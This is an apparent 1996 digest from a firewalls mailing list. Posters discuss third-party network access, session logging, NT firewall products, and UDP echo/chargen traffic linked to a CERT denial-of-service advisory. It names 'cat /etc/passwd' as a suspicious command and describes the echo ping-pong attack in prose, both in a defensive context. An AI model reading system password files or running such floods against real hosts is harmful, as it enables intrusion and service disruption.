Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA15416 for firewalls-outgoing; Sun, 11 Feb 1996 14:01:12 -0800 (PST)
Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA15411 for ; Sun, 11 Feb 1996 14:01:06 -0800 (PST)
Received: from pm1-02.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA00595; Sun, 11 Feb 96 16:59:48 -0500
Date: Sun, 11 Feb 96 16:59:48 -0500
Message-Id: <9602112159.AA00595@su1.in.net>
X-Sender: frankw@in.net
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Ken Hardy
From: Frank Willoughby
Subject: Re: Non-company Access ??
Cc: firewalls@GreatCircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Regarding Ken Hardy's posting at 04:13 PM 2/9/96 -0600 and subsequent postings by others on the same thread:

>In addition to some of the precautions already mentioned, on the rare
>occasions that I've had to allow outside access, I've logged _all_ the
>traffic involved (packet contents as well as headers) to a file on a
>third machine running tcpdump or snoop. The captured sessions get
>archived indefinitely, too.
>
>- KH

Actually, there shouldn't be a need to archive the data indefinitely or chew up MB or TB of data. If the data is only logged and archived, one hasn't really accomplished much. It is important to review the data - examine what commands were given and the order they were given. If possible, have the session replayed by someone who has the competency to determine whether a command was executed which shouldn't have been or whether something looks out of place. (Did they *really* need to cat /etc/passwd or peruse your security settings?)

Hmmm. Archiving the data is nice (as long as you are maintaining chain-of-custody), but if the sessions aren't reviewed, how will one know what happened, when it happened or who the alleged culprit was? Given the current workload of most sysadmins & infosec types, the chance of someone reviewing every session is fairly small. My preference is avoiding problems, rather than trying to assess blame.

Best Regards,

Frank

The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc.

Fortified Networks Inc.
- Management & Information Security Consulting
Phone: (317) 573-0800 - http://www.fortified.com/fortified
Home of the Free Internet Firewall Evaluation Checklist

From firewalls-owner Sun Feb 11 14:54:11 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA15963 for firewalls-outgoing; Sun, 11 Feb 1996 14:20:25 -0800 (PST)
Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA15957 for ; Sun, 11 Feb 1996 14:20:21 -0800 (PST)
Received: from pm1-02.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA01484; Sun, 11 Feb 96 17:19:17 -0500
Date: Sun, 11 Feb 96 17:19:17 -0500
Message-Id: <9602112219.AA01484@su1.in.net>
X-Sender: frankw@in.net
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: giff@congress.East.Sun.COM (Wayne Gifford - Internet Commerce Group)
From: Frank Willoughby
Subject: Re: Non-company Access ??
Cc: firewalls@GreatCircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 09:47 AM 2/10/96 -0500, Wayne Gifford allegedly wrote:
>>
>> In a few words .. can anyone tell me how your companies handle requests
>> for third party access to your networks ?
>>
>> I get frequent requests to provide PPP or SLIP access to contractors,
>> vendors, resellers, distributors, etc. for the purpose of accessing all
>> sorts of applications and data bases. I also get requests to "open a
>> hole in the firewall" to allow these folks to access our facilities.
>>
>
>Look into SKIP (Simple Key management for Internet Protocols), a draft
>Internet spec for doing just this sort of thing.
>
>
>Look at http://skip.incog.com for source and a Solaris implementation
>
>
>giff

Well, sort of.
Encryption is good for securing the pipe and preventing MITM (Man-In-The-Middle) attacks, but does nothing to prevent a bad guy at the other company from ravaging your systems and networks, and stealing you blind (confidential data, strategic business plans, engineering data, etc.)

IMO, the best solution to this problem is avoidance. If you have no choice, and *have* to let them in, let the vendor into a system which sits by itself on an isolated LAN. If this isn't possible, and other solutions also fail, you are probably in CYA (Cover Yourself Always) Mode. Be sure to start a document trail, get the powers-that-be to sign their approval of the connection (attached to your warning of potential consequences), and sit back and hope that the unexpected doesn't happen. (Of course, you are keeping these documents off-site, right? 8^) While you're at it, you might say a prayer or two. (You'll need all the help you can get).

Best Regards,

Frank

The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc.

Fortified Networks Inc.
- Management & Information Security Consulting
Phone: (317) 573-0800 - http://www.fortified.com/fortified
Home of the Free Internet Firewall Evaluation Checklist

From firewalls-owner Sun Feb 11 15:24:15 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA17074 for firewalls-outgoing; Sun, 11 Feb 1996 15:19:07 -0800 (PST)
Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA17069 for ; Sun, 11 Feb 1996 15:19:03 -0800 (PST)
Received: by netcom.netcom.com (8.6.12/Netcom) id PAA23955; Sun, 11 Feb 1996 15:14:57 -0800
Message-Id: <2.2.32.19960211001605.006d6b04@netcom.com>
X-Sender: dalel@netcom.com
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sat, 10 Feb 1996 17:16:05 -0700
To: Rabid Wombat
From: Dale Lancaster
Subject: Re: NT Firewalls/Web Servers -Reply
Cc: Chris Jenkins , doug@fc.com, firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 09:06 PM 2/7/96 -0500, Rabid Wombat wrote:
>
>
>On Wed, 7 Feb 1996, Chris Jenkins wrote:
>
>> Raptor Systems makes one of the only firewall products I know of for NT.
>> I will be getting an eval in to test it out...
>
>There was a discussion concerning a product called Catapult a while back
>- you might want to check the archives of this list for the past month or
>two.
>

I've heard third-hand rumors (not from my own company :-) that MS is not labelling their product as a firewall, but just a caching proxy service. Any one else heard such things?

And yes, Raptor has just released the NT product. Try it out!

:-)

dale

======================================================================
Dale Lancaster                 Raptor Systems              dalel@netcom.com
"It's better to be thought a fool rather than              (214) 423-6212
 to speak up and remove all doubt."
- Lincoln
======================================================================

From firewalls-owner Sun Feb 11 15:39:25 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA16952 for firewalls-outgoing; Sun, 11 Feb 1996 15:09:54 -0800 (PST)
Received: from netcom10.netcom.com (netcom10.netcom.com [192.100.81.120]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA16947 for ; Sun, 11 Feb 1996 15:09:50 -0800 (PST)
Received: by netcom10.netcom.com (8.6.12/Netcom) id PAA02073; Sun, 11 Feb 1996 15:06:24 -0800
Message-Id: <2.2.32.19960211000733.006eb9ac@netcom10.netcom.com>
X-Sender: dalel@netcom10.netcom.com
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sat, 10 Feb 1996 17:07:33 -0700
To: Dick_Wall@stratus.com
From: Dale Lancaster
Subject: Re: Non-company Access ??
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 05:27 PM 2/8/96 -0500, Dick_Wall@stratus.com wrote:
>In a few words .. can anyone tell me how your companies handle requests
>for third party access to your networks ?
>
>I get frequent requests to provide PPP or SLIP access to contractors,
>vendors, resellers, distributors, etc. for the purpose of accessing all
>sorts of applications and data bases. I also get requests to "open a
>hole in the firewall" to allow these folks to access our facilities.
>
>We don't "open holes", but we do register dial access accounts. (Too
>many of them to make me feel comfortable).
>
>Generally, we can't restrict access on a machine basis. The requests
>typically are for access to a broad base of systems. Furthermore, once
>they are on those systems, they are free to then access other machines
>that the filters won't catch.
>
>What do you all do ??
>

Just a suggestion.
Raptor sells a VPN product for $99 that encrypts and authenticates all traffic between the client system and the firewall or between clients (with the firewall administering the connection). This is a cost effective way of handling small remote sites and not having to run dedicated lines. They can all log into a local internet provider and tunnel through the Internet securely. Check out www.raptor.com for more info.

:-)

dale

======================================================================
Dale Lancaster                 Raptor Systems              dalel@netcom.com
"It's better to be thought a fool rather than              (214) 423-6212
 to speak up and remove all doubt." - Lincoln
======================================================================

From firewalls-owner Sun Feb 11 15:54:16 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA17043 for firewalls-outgoing; Sun, 11 Feb 1996 15:16:40 -0800 (PST)
Received: from netcom10.netcom.com (netcom10.netcom.com [192.100.81.120]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA17038 for ; Sun, 11 Feb 1996 15:16:37 -0800 (PST)
Received: by netcom10.netcom.com (8.6.12/Netcom) id PAA03113; Sun, 11 Feb 1996 15:13:32 -0800
Message-Id: <2.2.32.19960211001441.006bb3b4@netcom10.netcom.com>
X-Sender: dalel@netcom10.netcom.com
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sat, 10 Feb 1996 17:14:41 -0700
To: Dick_Wall@stratus.com
From: Dale Lancaster
Subject: Re: Non-company Access ??
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 05:27 PM 2/8/96 -0500, Dick_Wall@stratus.com wrote:
>In a few words .. can anyone tell me how your companies handle requests
>for third party access to your networks ?
>
>I get frequent requests to provide PPP or SLIP access to contractors,
>vendors, resellers, distributors, etc. for the purpose of accessing all
>sorts of applications and data bases.
>I also get requests to "open a
>hole in the firewall" to allow these folks to access our facilities.
>
>We don't "open holes", but we do register dial access accounts. (Too
>many of them to make me feel comfortable).
>
>Generally, we can't restrict access on a machine basis. The requests
>typically are for access to a broad base of systems. Furthermore, once
>they are on those systems, they are free to then access other machines
>that the filters won't catch.
>
>What do you all do ??
>

Just a suggestion. Raptor sells a VPN product for $99 that encrypts and authenticates all traffic between the client system and the firewall or between clients (with the firewall administering the connection). This is a cost effective way of handling small remote sites and not having to run dedicated lines. They can all log into a local internet provider and tunnel through the Internet securely. Check out www.raptor.com for more info.

:-)

dale

======================================================================
Dale Lancaster                 Raptor Systems              dalel@netcom.com
"It's better to be thought a fool rather than              (214) 423-6212
 to speak up and remove all doubt."
- Lincoln
======================================================================

From firewalls-owner Sun Feb 11 16:10:43 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA17994 for firewalls-outgoing; Sun, 11 Feb 1996 15:51:07 -0800 (PST)
Received: from hp.com (hp.com [15.255.152.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA17980 for ; Sun, 11 Feb 1996 15:51:02 -0800 (PST)
Received: from hpwcsvp.mayfield.hp.com by hp.com with SMTP (1.37.109.16/15.5+ECS 3.3) id AA251672621; Sun, 11 Feb 1996 15:50:21 -0800
Received: from a2426kjs.nsr.hp.com by hpwcsvp.mayfield.hp.com with SMTP (1.36.108.7/15.5+ECS 3.3) id AA24637; Sun, 11 Feb 1996 15:50:14 -0800
Date: Sun, 11 Feb 1996 15:50:13 -0800 (PST)
From: Kevin Steves
To: david r coelho
Cc: firewalls@GreatCircle.COM
Subject: Re: Web browser ports?
In-Reply-To: <9602091040.ZM11897@ppt.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 9 Feb 1996, david r coelho wrote:
> I'm getting some incoming packets to our Web server with src
> ports that are less than 1023. Are there browsers out there
> that use ports below 1023? Should I allow connections of
> the type:
>
> tcp src < 1023 dst = 80

In Chapter 14 of TCP/IP Illustrated Volume 3, Packets Found on an HTTP Server, Stevens notes that of 160,948 SYN segments received on a busy HTTP server in a 24 hour period, 14 had a source port number less than 1024. Other interesting statistics are presented, including the fact that over 10% of the SYNs contained an ISN of 0.
Kevin From firewalls-owner Sun Feb 11 16:25:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA18865 for firewalls-outgoing; Sun, 11 Feb 1996 16:09:29 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA18851 for ; Sun, 11 Feb 1996 16:09:23 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id TAA20698; Sun, 11 Feb 1996 19:05:56 -0500 Date: Sun, 11 Feb 1996 19:05:52 -0500 (EST) From: Rabid Wombat To: Brosl Hasslacher cc: firewalls@GreatCircle.COM Subject: Re: your (immature) mail In-Reply-To: <199602110130.RAA24174@azazel.sdsc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't approve of your racial slurs, and this mailing list is generally comprised of people who are against the tactics you've employed. As for skill, it takes more than fancy flyin'. ---------------------------------------- Rabid Wombat wombat@mcfeely.bsfs.org ---------------------------------------- A beady-slanty-eyed diseased marsupial. 
From firewalls-owner Sun Feb 11 16:33:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA17261 for firewalls-outgoing; Sun, 11 Feb 1996 15:28:44 -0800 (PST) Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA17253 for ; Sun, 11 Feb 1996 15:28:37 -0800 (PST) Received: by netcom.netcom.com (8.6.12/Netcom) id PAA25731; Sun, 11 Feb 1996 15:26:57 -0800 Message-Id: <2.2.32.19960211002806.006aa1c8@netcom.com> X-Sender: dalel@netcom.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 10 Feb 1996 17:28:06 -0700 To: firewalls@GreatCircle.COM From: Dale Lancaster Subject: Re: NT Firewalls/Web Servers -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:06 PM 2/7/96 -0500, Rabid Wombat wrote: > > >On Wed, 7 Feb 1996, Chris Jenkins wrote: > >> Raptor Systems makes a one of the only firewall products I know of for NT. >> I will be gettin an eval in to test it out... > >There was a discussion concerning a product called Catapult a while back >- you might want to check the archives of this list for the past month or >two. > I've heard third hand rumors (not from my own company :-) that MS is not labelling their product as a firewall, but just a caching proxy service. Any one else heard such things? And yes, Raptor has just released the NT product. Try it out! :-) dale ====================================================================== Dale Lancaster Raptor Systems dalel@netcom.com "Its better to be thought a fool rather than (214) 423-6212 to speak up and remove all doubt." 
- Lincoln ====================================================================== From firewalls-owner Sun Feb 11 16:39:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA17251 for firewalls-outgoing; Sun, 11 Feb 1996 15:28:23 -0800 (PST) Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA17246 for ; Sun, 11 Feb 1996 15:28:17 -0800 (PST) Received: by netcom.netcom.com (8.6.12/Netcom) id PAA25371; Sun, 11 Feb 1996 15:24:16 -0800 Message-Id: <2.2.32.19960211002525.006daf90@netcom.com> X-Sender: dalel@netcom.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 10 Feb 1996 17:25:25 -0700 To: Rabid Wombat From: Dale Lancaster Subject: Re: NT Firewalls/Web Servers -Reply Cc: Chris Jenkins , doug@fc.com, firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:06 PM 2/7/96 -0500, Rabid Wombat wrote: > > >On Wed, 7 Feb 1996, Chris Jenkins wrote: > >> Raptor Systems makes a one of the only firewall products I know of for NT. >> I will be gettin an eval in to test it out... > >There was a discussion concerning a product called Catapult a while back >- you might want to check the archives of this list for the past month or >two. > I've heard third hand rumors (not from my own company :-) that MS is not labelling their product as a firewall, but just a caching proxy service. Any one else heard such things? And yes, Raptor has just released the NT product. Try it out! :-) dale ====================================================================== Dale Lancaster Raptor Systems dalel@netcom.com "Its better to be thought a fool rather than (214) 423-6212 to speak up and remove all doubt." 
- Lincoln ====================================================================== From firewalls-owner Sun Feb 11 16:46:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA17269 for firewalls-outgoing; Sun, 11 Feb 1996 15:28:59 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA17264 for ; Sun, 11 Feb 1996 15:28:52 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) id PAA07140; Sun, 11 Feb 1996 15:25:17 -0800 Received: from netcom.netcom.com(192.100.81.100) by mycroft via smap (V1.3mjr) id sma007136; Sun Feb 11 15:24:44 1996 Received: by netcom.netcom.com (8.6.12/Netcom) id PAA25363; Sun, 11 Feb 1996 15:24:13 -0800 Message-Id: <2.2.32.19960211002522.006d6664@netcom.com> X-Sender: dalel@netcom.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 10 Feb 1996 17:25:22 -0700 To: Dick_Wall@stratus.com From: Dale Lancaster Subject: Re: Non-company Access ?? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 05:27 PM 2/8/96 -0500, Dick_Wall@stratus.com wrote: >In a few words .. can anyone tell me how your companies handle requests >for third party access to your networks ? > >I get frequent requests to provide PPP or SLIP access to contractors, >vendors, resellers, distributors, etc. for the purpose of accessing all >sorts of applications and data bases. I also get requests to "open a >hole in the firewall" to allow these folks to access our facilities. > >We don't "open holes", but we do register dial access accounts. (Too >many of them to make me feel comfortable). > >Generally, we can't restrict acces on a machine basis. The requests >typically are for access to a broad base of systems. 
Furthermore, once >they are on those systems, they are free to then access other machines >that the filters won't catch. > >What do you all do ?? > Just a suggestion. Raptor sells a VPN product for $99 that encrypts and authenticates all traffic between the client system and the firewall or between clients (with the firewall administratoring the connection). This is a cost effective way of handling small remote sites and not having to run dedicated lines. They can all log into a local internet provider and tunnel through the Internet securely. Checkout www.raptor.com for more info. :-) dale ====================================================================== Dale Lancaster Raptor Systems dalel@netcom.com "Its better to be thought a fool rather than (214) 423-6212 to speak up and remove all doubt." - Lincoln ====================================================================== From firewalls-owner Sun Feb 11 20:24:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA28298 for firewalls-outgoing; Sun, 11 Feb 1996 20:16:53 -0800 (PST) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA28293 for ; Sun, 11 Feb 1996 20:16:49 -0800 (PST) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id WAA16936; Sun, 11 Feb 1996 22:08:38 -0600 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma016934; Sun Feb 11 22:08:24 1996 Received: from ignatz (ignatz.bridge.com) by ignatz.bridge.com with SMTP id AA27030 (5.67b/IDA-1.5); Sun, 11 Feb 1996 22:22:52 -0600 Date: Sun, 11 Feb 1996 22:22:52 -0600 (CST) From: Ken Hardy X-Sender: ken@ignatz To: Frank Willoughby Cc: firewalls@GreatCircle.com Subject: Re: Non-company Access ?? 
In-Reply-To: <9602112159.AA00595@su1.in.net>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sun, 11 Feb 1996, Frank Willoughby wrote:
> chew up MB or TB of data. If the data is only logged and archived, one
> hasn't really accomplished much.
>
> It is important to review the data - examine what commands were given
> and the order they were given. If possible, have the session replayed
> by someone who has the competency to determine whether a command was

Thought that went without saying, which is why I went without saying it. :) Probably good to bring it out, though.

> Archiving the data is nice (as long as you are maintaining chain-of-custody),
> but if the sessions aren't reviewed, how will one know what happened, when
> it happened or who the alleged culprit was?

If questions later arise, possibly due to problems of undetermined origin, it seems it would be nice to have the session transcript to prove innocence as well as guilt; archive it even after examining it and giving your nihil obstat. I just leave it on my filesystem until it's made it onto the one backup a week that gets archived.

> Given the current workload of most sysadmins & infosec types, the chance
> someone reviewing every session is fairly small.

Could definitely be a problem, but so far it's been a very rare phenomenon here, so I haven't reached saturation, yet.
- KH From firewalls-owner Sun Feb 11 21:54:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA01189 for firewalls-outgoing; Sun, 11 Feb 1996 21:50:09 -0800 (PST) Received: from myall.awadi.com.au (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id VAA01184 for ; Sun, 11 Feb 1996 21:50:03 -0800 (PST) Received: from bunya.awadi ([150.207.2.63]) by myall.awadi.com.au (8.7.1/8.7.1) with SMTP id QAA08165; Mon, 12 Feb 1996 16:18:18 +1030 (CST) Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA04178; Mon, 12 Feb 1996 16:17:21 +1030 Received: by mallee.awadi (SMI-8.6/SMI-SVR4) id QAA13091; Mon, 12 Feb 1996 16:17:18 +1030 From: blymn@awadi.com.au (Brett Lymn) Message-Id: <199602120547.QAA13091@mallee.awadi> Subject: Re: anybody know of any vulnerabilities with "echo" To: joey@gxl.woodtech.com (Joe Smith) Date: Mon, 12 Feb 1996 16:17:16 +1030 (CST) Cc: firewalls@greatcircle.com In-Reply-To: from "Joe Smith" at Feb 10, 96 00:27:25 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Joe Smith: > >What is the loss of disabling echo? Or discard for that matter. > For an internet machine, not much I suppose but if you are running a Sun shop and remove discard from your boot server then do not expect your Sun diskless clients to reboot from power-up. We had this problem a while ago and it was driving me nuts, the discard service was commented out for another bit of software to run. Suddenly we could not get our diskless clients to boot when they were turned on. They would just hang, getting nowhere, if you interrupted the hang and type boot they would come up ok. Putting the discard service back into the inet.conf fixed the problem. 
-- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "Upgrading your memory gives you MORE RAM!" - ad in MacWAREHOUSE catalogue. From firewalls-owner Sun Feb 11 22:39:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA02041 for firewalls-outgoing; Sun, 11 Feb 1996 22:34:01 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id WAA02036 for ; Sun, 11 Feb 1996 22:33:57 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) id WAA08110; Sun, 11 Feb 1996 22:30:22 -0800 From: firewalls@count04.mry.scruznet.com Received: from count04.mry.scruznet.com(204.147.227.68) by mycroft via smap (V1.3mjr) id sma008108; Sun Feb 11 22:30:05 1996 Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id RAA08602; Sun, 11 Feb 1996 17:08:02 -0800 (PST) Message-Id: <199602120108.RAA08602@count04.mry.scruznet.com> To: Dale Lancaster cc: firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com Subject: Re: NT Firewalls/Web Servers -Reply In-reply-to: Your message of "Sat, 10 Feb 1996 17:28:06 MST." <2.2.32.19960211002806.006aa1c8@netcom.com> Date: Sun, 11 Feb 1996 17:08:02 -0800 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Stop with the sales talk PLEASE!!! or take it to email... 
cheers

From firewalls-owner Mon Feb 12 02:39:23 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA10704 for firewalls-outgoing; Mon, 12 Feb 1996 02:35:25 -0800 (PST)
Received: from relay-2.mail.demon.net (disperse.demon.co.uk [158.152.1.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA10684 for ; Mon, 12 Feb 1996 02:34:32 -0800 (PST)
Received: from theboard.reednews.co.uk ([194.159.23.1]) by relay-2.mail.demon.net id aa01703; 12 Feb 96 10:33 GMT
Received: by newsquest.co.uk (5.x/SMI-SVR4) id AA07566; Mon, 12 Feb 1996 10:35:06 GMT
From: Gavin Aiken
Message-Id: <9602121035.AA07566@newsquest.co.uk>
Subject: Re: anybody know of any vulnerabilities with "echo"
To: Firewalls List
Date: Mon, 12 Feb 1996 10:35:05 +0000 (GMT)
X-Mailer: ELM [version 2.4 PL24]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> > Hi Folks,
> >
> > At a particular Internet firewall I administer, I've noticed a rash of
> > "echo" (udp port 7) service attempts. These came on pretty suddenly (as if
> > a whole shwack of people found something out) and are pretty constant now.
> >
> > I'm wondering if a new vulnerability with the (a particular implementation
> > maybe) echo server has been found. Anybody else notice this trend??
> >
> I wonder, this smells heavily of the "Harvest cache Web server".
> Harvest uses some pretty wild checks on upstream web sites to see if
> they're up or not - the default is to "ping" the host using UDP echo
> packets - that could be what you're seeing.
> Of course, it goes without saying that such sites shouldn't set up such
> things without ASKING those sites first...

Two comments on these posts:

1/ This sudden rash of UDP packets: have you seen CERT(sm) Advisory CA-96.01, dated February 8, 1996? The topic is UDP Port Denial-of-Service Attack, and they detail network attacks based on the echo and chargen services. Need I say more?

2/ At our site, the firewall was already chucking away all the UDP rubbish coming through from the 'net, but I have now also disabled the echo etc services on the firewall host. Does this mean that Harvest might decide our web server is down, as it can't ping our domain in the way mentioned above? Or is it clever enough to try other methods as well? Are there any other 'clever' bits of software out there that might decide our site is dead?

Comments? (flames to my personal email :))

--
Gavin Aiken, "is the internet down?" administrator

-----------------------------------------------------------------------------
Address: Gavin Aiken        | Email: gavin@newsquest.co.uk
         IT Dept, RRN Lancs | Web:   www.newsquest.co.uk
         Newspaper House    | Work:  +44 (0)1254 678678
         High Street        | Fax:   +44 (0)1254 673347
         Blackburn          | Home:  +44 (0)1254 812956
-----------------------------------------------------------------------------
*finger gavin@theboard.reednews.co.uk for PGP Public Key*

From firewalls-owner Mon Feb 12 04:24:15 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA13684 for firewalls-outgoing; Mon, 12 Feb 1996 04:11:17 -0800 (PST)
Received: from hawk.hcsc.com (hawk.hcsc.com [204.5.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA13679 for ; Mon, 12 Feb 1996 04:11:11 -0800 (PST)
Received: from london.hcsc.com by hawk.hcsc.com (5.61/harris-5.1) id AA07331; Mon, 12 Feb 96 07:10:28 -0500
Received: by london.csd.harris.com (5.61/HARRIS-4.0) id AA01809; Mon, 12 Feb 96 12:10:34 GMT
From: jon@london.hcsc.com (Jon Shallow)
Message-Id: <9602121210.AA01809@london.csd.harris.com>
Subject: Re: anybody know of any vulnerabilities with "echo"
To: firewalls@greatcircle.com
Date: Mon, 12 Feb 96 12:10:33 GMT
In-Reply-To: <9602121035.AA07566@newsquest.co.uk>; from "Gavin Aiken" at Feb 12, 96 10:35 am
X-Mailer: ELM [version 2.2 PL10]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Maybe I am missing something here. Would not dropping any echo/chargen/time/daytime packet (both udp & tcp) that has a source port less than 1024 be better, rather than total denial of same packets ? If the source port is > 1023, then a ping-pong denial of service cannot be set up (I can see echo and time for instance being bounced between each other).

Regards

Jon

>
> > > Hi Folks,
> > >
> > > At a particular Internet firewall I administer, I've noticed a rash of
> > > "echo" (udp port 7) service attempts. These came on pretty suddenly (as if
> > > a whole shwack of people found something out) and are pretty constant now.
> > >
> > > I'm wondering if a new vulnerability with the (a particular implementation
> > > maybe) echo server has been found. Anybody else notice this trend??
> > >
> > I wonder, this smells heavily of the "Harvest cache Web server".
> > Harvest uses some pretty wild checks on upstream web sites to see if
> > they're up or not - the default is to "ping" the host using UDP echo
> > packets - that could be what you're seeing.
> >
> > Of course, it goes without saying that such sites shouldn't set up such
> > things without ASKING those sites first...
>
> Two comments on these posts:
>
> 1/ This sudden rash of UDP packets: have you seen CERT(sm) Advisory CA-96.01,
> dated February 8, 1996? The topic is UDP Port Denial-of-Service Attack,
> and they detail network attacks based on the echo and chargen services.
> Need I say more?
>
> 2/ At our site, the firewall was already chucking away all the UDP rubbish
> coming through from the 'net, but I have now also disabled the echo etc
> services on the firewall host. Does this mean that Harvest might decide
> our web server is down, as it can't ping our domain in the way mentioned
> above? Or is it clever enough to try other methods as well? Are there
> any other 'clever' bits of software out there that might decide our site
> is dead?
>
> Comments? (flames to my personal email :))
>
> --
> Gavin Aiken, "is the internet down?" administrator
>
> -----------------------------------------------------------------------------
> Address: Gavin Aiken        | Email: gavin@newsquest.co.uk
>          IT Dept, RRN Lancs | Web:   www.newsquest.co.uk
>          Newspaper House    | Work:  +44 (0)1254 678678
>          High Street        | Fax:   +44 (0)1254 673347
>          Blackburn          | Home:  +44 (0)1254 812956
> -----------------------------------------------------------------------------
> *finger gavin@theboard.reednews.co.uk for PGP Public Key*
>

--
Jon Shallow, Harris Computer Systems Corporation
Jon.Shallow@mail.hcsc.com
